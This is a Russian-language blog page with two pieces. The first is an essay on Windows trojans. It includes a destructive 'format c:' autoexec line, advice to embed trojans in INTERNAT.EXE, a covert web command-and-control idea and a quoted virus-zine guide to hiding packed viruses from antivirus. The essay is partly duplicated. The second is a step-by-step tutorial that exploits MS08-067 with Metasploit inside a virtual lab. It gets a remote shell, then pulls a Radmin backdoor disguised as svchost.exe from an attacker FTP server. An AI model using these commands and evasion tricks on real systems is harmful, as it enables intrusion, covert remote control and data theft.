3. Кстати, есть такое понятие, как "ловушки", то есть программы, перехватывающие нажатия клавиш на клавиатуре. Типичная стандартная Виндовая "ловушка", по определению одной из программ, показывающих информацию о системе - это "INTERNAT.EXE", та программа, которай отслеживает нажатия "Alt+Shift" или "Ctrl+Shift" (переключение с русского языка на английский), и показывающая в System Tray (около часов) иконку "Ru" или "En" соответственно. А есть и другие "ловушки", например достаточно широко распространенная программа "HookDump", которая логает (записывает в файл) не только нажатия клавиш, но и заголовок окна программы, в которой эти клавиши набирались, а также время, нажатия кнопок мыши и кое-что еще. Отрадно? Если всего этого не знать, то можно стать жертвой не то что профессионального хакера, а просто человека, возомнившего себя им, т.е. "псевдохакера" (или ламера, что еще хуже). Из всего этого вытекает. что троянец лучше всего внедрять в INTERNAT.EXE (а может, и еще кое-куда), т.к. кое-какие нужные функции эта программа уже выполняет.
4. Двигаемся дальше... Известно, что если компьютер находится за прокси-сервером, Firewall'ом или чем-то подобным, то опасность вторжения извне на этот компьютер снижается на несколько порядков. Но ничто не мешает сделать такой троян, который бы использовал стандартный WWW-интерфейс, то есть делал бы то же, что и пользователь - шел бы на указанный заранее WWW-адрес, например обращался бы к файлу http://www.vasja_pupkin.mil/command.cmd, в котором содержались бы команды типа "GET FILETREE", которые необходимо выполнить. Затем результаты отправлялись бы на адрес vasja@pupkin.mil, прочитав которые, злоумышленник запоимеет все, что ему надо. Как защититься от такого способа? Ведь если закрыть порты, как это делалось, например, с BackOrifice (блокация порта 31337, и нет проблем), то пользователь не сможет читать/отправлять почту, заниматься WEB-серфингом... То есть это есть потеря главной функции, к которой прицепился троян. Пока таких продуктов в широком употреблении нет, но я уверен, что они уже существуют.
5. В настоящее время есть много программ, который позволяют зашифровать и/или заархивировать исполняемый файл так, что антивирусы не смогут его обнаружить. Например, если рассмотреть старый DOSовый вариант самораспаковывающихся программ при их исполнении: цитирую первый номер хакерского журнала "Infected Voice":
"Подготовка вируса к распространению.
1. Как скрыть скомпрессированный файл
2. Как дважды скомпрессировать файл
1. Скрывая подготовленные к распространению вирусы в файле, заПыколотив (PKLITE) или заЛзексив их (LZEXE), хотя бы с опцией ExtraCompression, никогда нет уверенности в том, что та или иная задница (DR. WEB), увидев лейбл LZ или PKLITE, не полезет туда с целью выПЫколотить оригинальчик. Здесь предлагаются некоторые методы по защите от этого.
Конечно, для начала вы скомпрессируете ваш файл чем-нибудь типа PkLite или LZexe, и даже с опцией Extra Compression. Готово? Нет - это еще не все. Загрузите-ка этот файл в HEX-editor и посмотрите в начало:
Виден заголовок? "PKLITE Corp."... Забейте мусором все от "PKLITE... до ...Rights Reserved" , а также извратите до неузнаваемости надпись "Not enough memory", забейте ее нулями, (или символами 07 -вот пищать будет!) или чем-нибудь еще, но помните, что это г... будет выводиться на экран при нехватке памяти. Не трогайте '$'! Не забивайте эти участки текстом - это будет заметно.
Итак, теперь ваш файл - неразжимаем с помощью утилит - непонятен для глаза - непроверяем фаКами(тупейшие программы!),- теми из них, которые имеют наглость лезть файлам под одежду PkLite'вского производства.
Ну и, конечно, не стоит заражать файл вирусом в чистом виде. Лучше напишите инсталлятор, который сделает это не сразу.
2. Сейчас я расскажу вам, как скомпрессировать файл два раза:
- один раз - Pklite'ом
- второй раз - LZExe
Что тут неясного - откомпрессить файл Pklite'ом, потом Lzexe... Нате вам дулю - Lzexe не напишет что-то типа "ужат на минус 5%", он просто не даст вам такого сделать ваще! А теперь вы ему дулю - посмотрите, что там у нас в текущем каталоге, хорошо посмотрите, - Undelet'oм. хZEXE.TMP. Восстановим LZEXE.TMP - это и есть дважды обработанный файл. Переименовываем его в то, что нам надо. Дальше см. п.5.1."
Конец цитаты... Впечатляет? Как говорится, все гениальное просто. И от DOSа до WINDOWSа в этом смысле всего лишь один шаг. Антивирус не сможет обнаружить сигнатуру вируса, это сможет сделать только человек. В смысле, не обнаружить сигнатуру, а обнаружить наличие вируса на компьютере. Как - это уже другой вопрос, и он рассматривается в другой моей статье.
Елесин Д.Е.
Итак... Многие ругают операционную систему WINDOWS любой версии и его создателя Билла Гейтса. Действительно, хороша или плоха его операционная система? Как говорится, это еще бабушка надвое сказала. С одной стороны - хороша, с другой - плоха...
Чем хороша? Прежде всего тем, что она КРАЙНЕ проста в установке, настройке и использовании (На взгляд "простого" пользователя). Практически любой человек, даже не имевший опыта работы за компьютером, может за пару дней научиться сносно использовать его для офиса, для игр и для прочих задач. В этом смысле WINDOWS - это воплощение гениальной идеи. (Я это серьезно!).
А чем же плоха WINDOWS, что многие ругают ее последними словами? О, тут вам "крутой компьютерщик" много чего наговорит... Сразу стоит сказать, что это далеко не самая стабильная в работе операционная система, это присуще как ее первым версиям, так и последним. Процитирую одного из "серьезных" пользователей: - "Как я могу доверить свою научную работу этой операционке, если она в любой момент отправит все мои труды коту под хвост?" Этот человек действительно в результате сбоя потерял важные данные...
Но самое важное, что операционная система WINDOWS буквально оптимизирована для взлома...
Действительно, Microsoft не потрудилась применить криптостойкие алгоритмы защиты (частный случай). Что было сделано, чтоб спрятать те же самые пароли? Всего лишь то, чтоб их нельзя было увидеть, нажав F3 в Нортон Коммандере. Это помогло бы только против самых что ни на есть "псевдо" хакеров. (Даже нечем похвалиться, если бы вас так подломали).
Но создатели WINDOWS решили не утруждать себя и закодировали все пароли в системе некриптостойкими алгоритмами, в частности за"XOR"иванием. Такое кодирование вскрывается за доли секунды, в отличие от метода кодирования паролей в UNIX-системах, где вскрыть пароль можно только прямым перебором, да и то при достаточно большой вычислительной можности перебор всех вариантов одного пароля займет в среднем 12 тысяч лет.
Но самое примечательное - это то, что в плане атак по сети WINDOWS просто полностью открыта! Есть немало программ, которые посылая несколько байтов по сети на компьютер-жертву, заставляют его зависнуть или перезагрузиться. В народе по этому поводу проскакивают такие слова, как "Nuke", "Ping Flood", "TearDrop" и много чего еще. Об этих атаках много уже написано статей, обзоров, уже существует достаточное количество "заплаток", и если грамотно воспользоваться этим, то можно себя более-менее обезопасить.
Но существует такой изощренный способ атак, что большинство людей перед ними бессильны. Что это? Можно сказать одним словом - ТРОЯНЫ.
Трояны - что это такое? Чем они отличаются от вирусов, как распространяются, какой вред они могут принести?
Само определение "Троян", или "Троянский конь" появилось по аналогии с мифическим конем, то есть снаружи это красивая вещь, а внутри спрятано что-то нехорошее. Что именно? Про все трояны ничего конкретного сказать нельзя, можно лишь отметить, что от вирусов они отличаются тем, что зачастую управляются человеком, сидящим "на другом конце провода". Это в том случае, если ваш компьютер подключен к Интернет. Отсутствие подключения зачастую сводит на нет все усилия троянов. Данные программы могут не иметь деструктивных функций. Их назначение иное - извлекать информацию, несанкционированно изменять ее, а также иметь полный контроль над компьютером, настолько полный, что даже человек, сидящий не посредственно за ним, не может так всеобъемлемо управлять этим теперь уже непредсказуемым "ящиком".
Итак, что же из себя представляет программа-троян? А ничего особенного, даже начинающий программист способен ее написать. Принцип основан на том, что программа является одной из задач Windows, как правило, невидимой по Ctrl-Alt-Del. Программа-троян "слушает" порты (это то, благодаря чему существует соединение по сети, портов может быть до 65535. Например, ftp-сервер слушает 21 порт, web-сервер, как правило, 80 порт, почтовый сервер - порт 25 для отправки и порт 110 для приема почты), и когда на определенный порт приходит пакет данных, программа-троян исполняет пришедшие команды.
Для трояна ничего не стоит выцепить любой закешированный пароль к любому из ресурсов, перехватывать нажатие клавиш на вашей клавиатуре...
Ниже я приведу далеко не полный список функций, выполняемых троянами. Вы представьте сразу, что эти действия выполняются на вашей машине. Итак, начнем...
Доступ к дискам. Можно копировать, стирать файлики... Все файловые операции, то есть. Ничего не стоит прочитать вашу почту, которая уже получена и хранится в файле "Inbox", или поправить autoexec.bat, вписав туда строчку "echo y|format c:>nul", благодаря которой при перезагрузке жесткий диск будет безо всяких вопросов отформатирован.
Перехват клавиатуры. Вот он, ваш парольчик-то... Кража закешированных паролей (тех, что "запоминаются" системой). Вот все пароли сразу...
Сбор информации о системе (какой логин, сколько памяти, диски, принтеры...)
Получение копии вашего экрана. Без комментариев.
Запрещение нажатий определенных клавиш на клавиатуре. (Издевательство.)
Поменять кнопки мышки местами. (Тоже издевательство.)
Контроль координат курсора мыши (ой, мышка сама ездит???)
Открыть/закрыть CD-ROM. (Оооочень забавно...)
Или вообще блокировать кнопку "Eject" на нем... (CD-ROM сломался!!!)
Перенаправление консоли (то есть как telnet, только например, command.com запустился у вас, а на экран он вышел не у вас... А тот человек набрал команду "format c:" и нажал "y"...)
Перенаправление портов. Это еще серьезней. Злоумышленник будет ломать банк, Белый Дом, спутники... А ФБР или ФСБ почему-то придет к вам... То есть, сигнал пойдет от злоумышленника через ваш компьютер, и везде засветится именно ваш IP-адрес...
Узнать, какие программы у вас запущены.
Закрыть парочку этих программ (например, пасьянс у секретарши или Word у профессора...)
Запустить программу (вот вам калькулятор, считайте на здоровье. Или еще один, новый троян, которого антивирусы не видят.)
Вывести на экран картинку (порно, в то время, когда у начальника важный посетитель.)
Показать/убрать панель задач (вот весело-то, кнопки Пуск нет... часов нет...)
Выключить или перезагрузить компьютер. (Без комментариев.)
Отключить компьютер от Интернета. (Пусть перезагружается, чтоб снова работать)
Если у вас подключен микрофон, то можно услышать вас.
Если у вас есть Web-Camera, то можно и увидеть вас.
Если у вас слишком громко играет музыка, то можно ее вам убавить.
Или наоборот, проиграть на вашей машине звуковой файл...
А можно и документ на вашем принтере напечатать. Можно подредактировать ваш реестр. Там хранятся ВСЕ настройки... Что "настройщику" придет в голову, неизвестно.
Можно диалоговые окошки выводить. Вот такие, например...
Иногда полезно бывает открыть вам броузер и "послать" вас например, на www.fuck.ru. Вам должно понравиться. Особенно если вы человек высокой морали.
Можно вывести окошко, в котором вы обычно набираете пароль... 90 %, что вы наберете его. Это может быть пароль от почты, от ICQ или еще от чего-нибудь. Последствия известны...
Можно посмотреть, что вы там через буфер обмена носите. А может, там пароль???
В конце концов, можно стереть у вас содержимое Flash-BIOS. Последствия будут, как от вируса "Чернобыль" (Win.CIH).
Можно с машины-жертвы просканировать порты, например, на сервере... Вот админ сервера удивится, когда начальник, ничего в этом не понимающий, засветит свой IP в логах...
Можно переименовать заголовки окон, например, "WinWord" в "Привет от Васи Пупкина"... Человек будет в трансе...
Можно текст вам переслать, как будто вы его сами на клавиатуре набрали. (Клавиатура с ума сошла!!!)
Время на компьютере изменить - тоже не проблема. Особенно опасным может быть такая комбинация: закачать вам на диск вирус "Чернобыль" (Win.Cih), изменить время на 26 апреля, запустить этот файл, с полчасика подождать и перезагрузить вас.
Ваш компьютер может посылать каждый раз при включении почту злоумышленнику, сообщая о времени включения и о других параметрах.
А также в некоторых троянах есть функция самоликвидирования, то есть при грамотном использовании их можно нанести очень большой урон и замести практически все следы деятельности, так что доказательств не останется.
Вот такие пироги... Это далеко не полный список. Это всего лишь то, что я вспомнил "с лету". Подытоживая все это, хочу сказать, что контроль над компьютером таким образом осуществляется АБСОЛЮТНО ПОЛНЫЙ. Насколько полный - зависит от конкретного трояна и от фантазии его создателей. Прогресс идет...
Вот моя точка зрения, как дальше будут развиваться трояны:
1. Насчет обнаруживаемости антивирусами... Ну, тут вряд ли что-то изменится, концепция известна давно. Спустя некоторое время после попадания вредной программы в руки антивирусописателей, на многих компьютерах часы данной программы сочтены.
2. Насчет расположения... Классический троян при запуске копирует себя в директорию Windows, например, и прописывает в реестр строку старта. Или это делается в файлах system.ini, win.ini и им подобных. Этот способ обнаружения знают многие, в таком случае даже антивируса или каких-то дополнительных программ не надо. Достаточно стандартного REGEDIT'а, или MSCONFIG (им-то я и пользуюсь). Новые поколения троянов скорее всего, будут внедряться по вирусному типу (а есть уже такие) в системные библиотеки. Таким образом, нигде не будет видна стартовая строка трояна.
3. Кстати, есть такое понятие, как "ловушки", то есть программы, перехватывающие нажатия клавиш на клавиатуре. Типичная стандартная Виндовая "ловушка", по определению одной из программ, показывающих информацию о системе - это "INTERNAT.EXE", та программа, которай отслеживает нажатия "Alt+Shift" или "Ctrl+Shift" (переключение с русского языка на английский), и показывающая в System Tray (около часов) иконку "Ru" или "En" соответственно. А есть и другие "ловушки", например достаточно широко распространенная программа "HookDump", которая логает (записывает в файл) не только нажатия клавиш, но и заголовок окна программы, в которой эти клавиши набирались, а также время, нажатия кнопок мыши и кое-что еще. Отрадно? Если всего этого не знать, то можно стать жертвой не то что профессионального хакера, а просто человека, возомнившего себя им, т.е. "псевдохакера" (или ламера, что еще хуже). Из всего этого вытекает. что троянец лучше всего внедрять в INTERNAT.EXE (а может, и еще кое-куда), т.к. кое-какие нужные функции эта программа уже выполняет.
4. Двигаемся дальше... Известно, что если компьютер находится за прокси-сервером, Firewall'ом или чем-то подобным, то опасность вторжения извне на этот компьютер снижается на несколько порядков. Но ничто не мешает сделать такой троян, который бы использовал стандартный WWW-интерфейс, то есть делал бы то же, что и пользователь - шел бы на указанный заранее WWW-адрес, например обращался бы к файлу http://www.vasja_pupkin.mil/command.cmd, в котором содержались бы команды типа "GET FILETREE", которые необходимо выполнить. Затем результаты отправлялись бы на адрес vasja@pupkin.mil, прочитав которые, злоумышленник запоимеет все, что ему надо. Как защититься от такого способа? Ведь если закрыть порты, как это делалось, например, с BackOrifice (блокация порта 31337, и нет проблем), то пользователь не сможет читать/отправлять почту, заниматься WEB-серфингом... То есть это есть потеря главной функции, к которой прицепился троян. Пока таких продуктов в широком употреблении нет, но я уверен, что они уже существуют.
5. В настоящее время есть много программ, который позволяют зашифровать и/или заархивировать исполняемый файл так, что антивирусы не смогут его обнаружить. Например, если рассмотреть старый DOSовый вариант самораспаковывающихся программ при их исполнении: цитирую первый номер хакерского журнала "Infected Voice":
"Подготовка вируса к распространению.
1. Как скрыть скомпрессированный файл
2. Как дважды скомпрессировать файл
1. Скрывая подготовленные к распространению вирусы в файле, заПыколотив (PKLITE) или заЛзексив их (LZEXE), хотя бы с опцией ExtraCompression, никогда нет уверенности в том, что та или иная задница (DR. WEB), увидев лейбл LZ или PKLITE, не полезет туда с целью выПЫколотить оригинальчик. Здесь предлагаются некоторые методы по защите от этого.
Конечно, для начала вы скомпрессируете ваш файл чем-нибудь типа PkLite или LZexe, и даже с опцией Extra Compression. Готово? Нет - это еще не все. Загрузите-ка этот файл в HEX-editor и посмотрите в начало:
Виден заголовок? "PKLITE Corp."... Забейте мусором все от "PKLITE... до ...Rights Reserved" , а также извратите до неузнаваемости надпись "Not enough memory", забейте ее нулями, (или символами 07 -вот пищать будет!) или чем-нибудь еще, но помните, что это г... будет выводиться на экран при нехватке памяти. Не трогайте '$'! Не забивайте эти участки текстом - это будет заметно.
Итак, теперь ваш файл - неразжимаем с помощью утилит - непонятен для глаза - непроверяем фаКами(тупейшие программы!),- теми из них, которые имеют наглость лезть файлам под одежду PkLite'вского производства.
Ну и, конечно, не стоит заражать файл вирусом в чистом виде. Лучше напишите инсталлятор, который сделает это не сразу.
2. Сейчас я расскажу вам, как скомпрессировать файл два раза:
- один раз - Pklite'ом
- второй раз - LZExe
Что тут неясного - откомпрессить файл Pklite'ом, потом Lzexe... Нате вам дулю - Lzexe не напишет что-то типа "ужат на минус 5%", он просто не даст вам такого сделать ваще! А теперь вы ему дулю - посмотрите, что там у нас в текущем каталоге, хорошо посмотрите, - Undelet'oм. хZEXE.TMP. Восстановим LZEXE.TMP - это и есть дважды обработанный файл. Переименовываем его в то, что нам надо. Дальше см. п.5.1."
Конец цитаты... Впечатляет? Как говорится, все гениальное просто. И от DOSа до WINDOWSа в этом смысле всего лишь один шаг. Антивирус не сможет обнаружить сигнатуру вируса, это сможет сделать только человек. В смысле, не обнаружить сигнатуру, а обнаружить наличие вируса на компьютере. Как - это уже другой вопрос, и он рассматривается в другой моей статье.
Елесин Д.Е.
вівторок, 17 березня 2009 р.
ВЗЛОМ ПК, под управлением Windows.
#ВЗЛОМ ПК, под управлением Windows. #КЛАССИФИКАЦИЯ АТАК.
Атаки на протокол
Атаки на ПО
Атаки на пользователя
ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.
Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.
Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.
Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_sPqVgrSI/AAAAAAAAABU/mbkjmgkOPZw/s1600-h/4.JPG
Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому
http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_sYkHlZUI/AAAAAAAAABc/qjfM2pZ377g/s320/6.JPG
адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tAviI_NI/AAAAAAAAABk/9KgaPlft3Vg/s320/7.JPG
Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.
http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_tPG8Z0HI/AAAAAAAAABs/VhLjeTEXL3U/s320/8.JPG
Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_tbjgIAiI/AAAAAAAAAB0/lDyNMxBWq5g/s320/9.JPG
#УСТАНОВКА СВЯЗИ.#
Необходимый софт:
ФТП — сервер (Serv -U)
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.
http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_t-0smY_I/AAAAAAAAAB8/gfPFPI4pUD8/s400/11.JPG
IP адресс 192.168.1.3
Маска подсети 255.255.255.0
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_uM38r_JI/AAAAAAAAACE/1rMp4pVRuhc/s400/10.JPG
Настраиваем следующим образом:
IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.
http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_ueYAqsjI/AAAAAAAAACM/nM1W9kgxHBY/s400/12.JPG
#ПРИМЕР.#
Необходимый софт:
Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)
Сканим комп xspider'ом
http://1.bp.blogspot.com/_oxXdxKIGwp0/Sa_5nXMqGLI/AAAAAAAAACs/TZRNc3_wzlA/s400/16.JPG
Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.
http://3.bp.blogspot.com/_oxXdxKIGwp0/Sa_uwjg_pzI/AAAAAAAAACU/r3l9-k44ksE/s400/13.JPG
use windows/smb/ms08_067_netapi ; наш сплоит
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; хост-жертва
RHOST => 192.168.1.10
set LPORT 7777 ; локальный порт
LPORT => 7777
set RPORT 445 ; удаленный порт
RPORT => 445
exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
C:WINDOWSsystem32>
Получили командную строку на удаленной системе
{создаем в папке windows, папку helps}
cd c:windows
mkdir helps
{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny
{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir
{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe
{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye
{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
{устанавливаем Radmin у жертвы}
111.bat
http://4.bp.blogspot.com/_oxXdxKIGwp0/Sa_weqnkS1I/AAAAAAAAACc/de-qr4zW1Xo/s400/14.JPG
Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.
http://2.bp.blogspot.com/_oxXdxKIGwp0/Sa_wqRwzH3I/AAAAAAAAACk/A7Xi7UIkWaE/s400/15.JPG
Снял видео, там же и статья отформатированная в pdf:
http://ifolder.ru/10884195
http://kerny-auroras.blogspot.com/2009/03/windows.html
Удачи!
Підписатися на:
Дописи (Atom)
